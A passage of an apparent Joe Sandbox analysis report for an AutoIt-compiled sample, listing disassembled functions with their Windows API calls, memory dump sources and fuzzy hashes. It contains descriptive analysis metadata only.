                                                                                                                  • Opcode Fuzzy Hash: 6f9cbde12243b194d977202fc25cafce340189aefbb9d22349b9637fb09741f2
                                                                                                                  • Instruction Fuzzy Hash: EAD1A275A0060A9FDF24CF98C881BAEB7F5FF48344F2484A9E915AB281D771ED45CB90
                                                                                                                  Function 00AF1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00AF17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00AF15CE
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00AF17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AF1651
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00AF17FB,?,00AF17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AF16E4
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00AF17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AF16FB
                                                                                                                    • Part of subcall function 00AE3820: RtlAllocateHeap.NTDLL(00000000,?,00B81444,?,00ACFDF5,?,?,00ABA976,00000010,00B81440,00AB13FC,?,00AB13C6,?,00AB1129), ref: 00AE3852
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00AF17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00AF1777
                                                                                                                  • __freea.LIBCMT ref: 00AF17A2
                                                                                                                  • __freea.LIBCMT ref: 00AF17AE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2829977744-0
                                                                                                                  • Opcode ID: 2e91fe23b721600a12e26eb7591eb1795de800d1eaafa58d9cf377f7c0d56ad8
                                                                                                                  • Instruction ID: 265ff15dd5bb83133ca94a473cd930bee8d9326f6430cb3f7109269ed67c7dba
                                                                                                                  • Opcode Fuzzy Hash: 2e91fe23b721600a12e26eb7591eb1795de800d1eaafa58d9cf377f7c0d56ad8
                                                                                                                  • Instruction Fuzzy Hash: E791B072E0021ADADF209FF5C981AFEBBB5AF49710F184659FA05E7150DB35DD408BA0
                                                                                                                  Function 00B34523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                  • API String ID: 2610073882-625585964
                                                                                                                  • Opcode ID: dcc44488d055732b41472bb5b20c530b289b43bc555efa97d0fd6fe949db5d04
                                                                                                                  • Instruction ID: 0bc86f448b46c03877d10f53d5ccf9278419d0bdd590f8e3aeb0e9f8ee02c24a
                                                                                                                  • Opcode Fuzzy Hash: dcc44488d055732b41472bb5b20c530b289b43bc555efa97d0fd6fe949db5d04
                                                                                                                  • Instruction Fuzzy Hash: 57918071A00215EBDF20CFA4D885FAEBBF8EF46710F208599F515AB291D770AD45CBA0
                                                                                                                  Function 00B21187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00B2125C
                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B21284
                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00B212A8
                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B212D8
                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B2135F
                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B213C4
                                                                                                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B21430
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2550207440-0
                                                                                                                  • Opcode ID: 737b8f277f3acf0ca0e7b265a835538141e9cadea8e4599dcc840a93f07e8188
                                                                                                                  • Instruction ID: 73fd0a99bbbbf65f6b15e378917268919a13409479743c09ec006ae3e7741251
                                                                                                                  • Opcode Fuzzy Hash: 737b8f277f3acf0ca0e7b265a835538141e9cadea8e4599dcc840a93f07e8188
                                                                                                                  • Instruction Fuzzy Hash: 8B911375A00228AFDB00DFA8E884BFE77F5FF15714F1048A9E918EB291D774A941CB90
                                                                                                                  Function 00AC948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3225163088-0
                                                                                                                  • Opcode ID: f9d626e40a7e87edc85086e11f60c83b89647c741dc8981cef47426ece3bbccc
                                                                                                                  • Instruction ID: 1fcff28ea52dbeb4b9c08904a335da97489a32703826b3c7d869e90451857c87
                                                                                                                  • Opcode Fuzzy Hash: f9d626e40a7e87edc85086e11f60c83b89647c741dc8981cef47426ece3bbccc
                                                                                                                  • Instruction Fuzzy Hash: ED913771D40219EFCB10CFA9C988AEEBBB8FF49320F158059E515B7291D774AA42CB60
                                                                                                                  Function 00B33947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00B3396B
                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00B33A7A
                                                                                                                  • _wcslen.LIBCMT ref: 00B33A8A
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B33C1F
                                                                                                                    • Part of subcall function 00B20CDF: VariantInit.OLEAUT32(00000000), ref: 00B20D1F
                                                                                                                    • Part of subcall function 00B20CDF: VariantCopy.OLEAUT32(?,?), ref: 00B20D28
                                                                                                                    • Part of subcall function 00B20CDF: VariantClear.OLEAUT32(?), ref: 00B20D34
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                  • API String ID: 4137639002-1221869570
                                                                                                                  • Opcode ID: afa760aecfb44560a2614df7d444969fef146498f3c64d7b7136db6139cb4dac
                                                                                                                  • Instruction ID: 5371572972eb8896449c08f3c0304a759c9fa6b12a7a4445abf808d6f0b97ff0
                                                                                                                  • Opcode Fuzzy Hash: afa760aecfb44560a2614df7d444969fef146498f3c64d7b7136db6139cb4dac
                                                                                                                  • Instruction Fuzzy Hash: 8C9147756083019FC700DF24C58196ABBE4FF89714F2489ADF89A9B351DB30EE45CB92
                                                                                                                  Function 00B34BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B1000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?,?,?,00B1035E), ref: 00B1002B
                                                                                                                    • Part of subcall function 00B1000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?,?), ref: 00B10046
                                                                                                                    • Part of subcall function 00B1000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?,?), ref: 00B10054
                                                                                                                    • Part of subcall function 00B1000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B0FF41,80070057,?), ref: 00B10064
                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00B34C51
                                                                                                                  • _wcslen.LIBCMT ref: 00B34D59
                                                                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00B34DCF
                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 00B34DDA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                  • API String ID: 614568839-2785691316
                                                                                                                  • Opcode ID: 6a3931ec4053fea6564f671e46613feb463381599083e8a97b16ea9fc9d18bfd
                                                                                                                  • Instruction ID: c091629dd0bf3b6737778eba18e23afa1e79bce20008d7e798a999b888cff830
                                                                                                                  • Opcode Fuzzy Hash: 6a3931ec4053fea6564f671e46613feb463381599083e8a97b16ea9fc9d18bfd
                                                                                                                  • Instruction Fuzzy Hash: 4E910971D002199FDF14DFA4D891AEEBBB8FF08310F2085AAE515A7251DB74AE45CF60
                                                                                                                  Function 00B420FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetMenu.USER32(?), ref: 00B42183
                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00B421B5
                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B421DD
                                                                                                                  • _wcslen.LIBCMT ref: 00B42213
                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00B4224D
                                                                                                                  • GetSubMenu.USER32(?,?), ref: 00B4225B
                                                                                                                    • Part of subcall function 00B13A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B13A57
                                                                                                                    • Part of subcall function 00B13A3D: GetCurrentThreadId.KERNEL32 ref: 00B13A5E
                                                                                                                    • Part of subcall function 00B13A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B125B3), ref: 00B13A65
                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B422E3
                                                                                                                    • Part of subcall function 00B1E97B: Sleep.KERNEL32 ref: 00B1E9F3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4196846111-0
                                                                                                                  • Opcode ID: 70acaa176bf6bd2b6f13ce1ac20627f68e77913170f88975b54b1ba3d26fb33a
                                                                                                                  • Instruction ID: a26d2dedd8e9a91959792e1cee22fd6f23bf7b95a1bd3c5717324c8909e2bb2f
                                                                                                                  • Opcode Fuzzy Hash: 70acaa176bf6bd2b6f13ce1ac20627f68e77913170f88975b54b1ba3d26fb33a
                                                                                                                  • Instruction Fuzzy Hash: 38718E75A00205AFCB10DF64C981AAEBBF5FF88310F508499F916EB341DB74EE41AB90
                                                                                                                  Function 00B47E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • IsWindow.USER32(017E4D00), ref: 00B47F37
                                                                                                                  • IsWindowEnabled.USER32(017E4D00), ref: 00B47F43
                                                                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B4801E
                                                                                                                  • SendMessageW.USER32(017E4D00,000000B0,?,?), ref: 00B48051
                                                                                                                  • IsDlgButtonChecked.USER32(?,?), ref: 00B48089
                                                                                                                  • GetWindowLongW.USER32(017E4D00,000000EC), ref: 00B480AB
                                                                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B480C3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4072528602-0
                                                                                                                  • Opcode ID: e6f77e8a4446961a3ea8a421db454f18a736f9eea246dce5576a9c0667488113
                                                                                                                  • Instruction ID: 189f1ab4db1832651c8944beef964c02545686e989886e9d53acb18176f0230c
                                                                                                                  • Opcode Fuzzy Hash: e6f77e8a4446961a3ea8a421db454f18a736f9eea246dce5576a9c0667488113
                                                                                                                  • Instruction Fuzzy Hash: A6718E34649244AFEB219F64C884FBA7BF9FF1A300F14449AE94597261CF31AE49EB50
                                                                                                                  Function 00B1AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(?), ref: 00B1AEF9
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00B1AF0E
                                                                                                                  • SetKeyboardState.USER32(?), ref: 00B1AF6F
                                                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B1AF9D
                                                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B1AFBC
                                                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B1AFFD
                                                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B1B020
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 87235514-0
                                                                                                                  • Opcode ID: 7faa8f6969708e170d583f7519c556aa6a01230ba7aac6861d45dee8fea16bcc
                                                                                                                  • Instruction ID: 4edafadb3e3e85a7a90c8b83c1eb7fb57ceacd75fad8df3b589abc42467d16f9
                                                                                                                  • Opcode Fuzzy Hash: 7faa8f6969708e170d583f7519c556aa6a01230ba7aac6861d45dee8fea16bcc
                                                                                                                  • Instruction Fuzzy Hash: 0351E4A16057D53DFB3642348C49BFA7FE99B06304F4884C9F1D9868C2C3A8ADC9D761
                                                                                                                  Function 00B1ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(00000000), ref: 00B1AD19
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00B1AD2E
                                                                                                                  • SetKeyboardState.USER32(?), ref: 00B1AD8F
                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B1ADBB
                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B1ADD8
                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B1AE17
                                                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B1AE38
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 87235514-0
                                                                                                                  • Opcode ID: 482f1a31c317662b07ed690f1e2a28db4e2a1a4b68670c3012f34e579ce94a8a
                                                                                                                  • Instruction ID: c8bed683c2fe9c5e670da99d25d09fc0cd3ea7c7a160dcf432e0f9f6c0b44761
                                                                                                                  • Opcode Fuzzy Hash: 482f1a31c317662b07ed690f1e2a28db4e2a1a4b68670c3012f34e579ce94a8a
                                                                                                                  • Instruction Fuzzy Hash: 4951F3A15067D53DFB3283348C85BFABEE8AB46300F5884D8E0D5568C2C6A4FCD8D762
                                                                                                                  Function 00AE542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetConsoleCP.KERNEL32(00AF3CD6,?,?,?,?,?,?,?,?,00AE5BA3,?,?,00AF3CD6,?,?), ref: 00AE5470
                                                                                                                  • __fassign.LIBCMT ref: 00AE54EB
                                                                                                                  • __fassign.LIBCMT ref: 00AE5506
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00AF3CD6,00000005,00000000,00000000), ref: 00AE552C
                                                                                                                  • WriteFile.KERNEL32(?,00AF3CD6,00000000,00AE5BA3,00000000,?,?,?,?,?,?,?,?,?,00AE5BA3,?), ref: 00AE554B
                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,00AE5BA3,00000000,?,?,?,?,?,?,?,?,?,00AE5BA3,?), ref: 00AE5584
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1324828854-0
                                                                                                                  • Opcode ID: 2b834c8fe09206eb8cc51efa1f0d7c3e239a23de31a0089d5d771f7c837cd10b
                                                                                                                  • Instruction ID: 41108ff56d4a71d23c1713041c8ddf0a0be92b99ad1308abb3c26406da2503ec
                                                                                                                  • Opcode Fuzzy Hash: 2b834c8fe09206eb8cc51efa1f0d7c3e239a23de31a0089d5d771f7c837cd10b
                                                                                                                  • Instruction Fuzzy Hash: 1851B371E00689AFDB10CFB9E845AEEBBF9EF09304F14415AF555E7291D7309A41CB60
                                                                                                                  Function 00AD2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00AD2D4B
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00AD2D53
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00AD2DE1
                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00AD2E0C
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00AD2E61
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                  • Opcode ID: 2e38d395779904f264445258fe9e8b9dfe154fb665ea2d289783b95978af3bff
                                                                                                                  • Instruction ID: a631aa8298e4507b582c045ef4d1ddcd688da8b136c778aa75585869caf9da72
                                                                                                                  • Opcode Fuzzy Hash: 2e38d395779904f264445258fe9e8b9dfe154fb665ea2d289783b95978af3bff
                                                                                                                  • Instruction Fuzzy Hash: AE41A335A00209ABCF10DF68C845B9EBFB5BF54324F148196E8566B392DB31AE05CBD1
                                                                                                                  Function 00B310B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B3304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B3307A
                                                                                                                    • Part of subcall function 00B3304E: _wcslen.LIBCMT ref: 00B3309B
                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B31112
                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00B31121
                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00B311C9
                                                                                                                  • closesocket.WSOCK32(00000000), ref: 00B311F9
                                                                                                                  Memory Dump Source
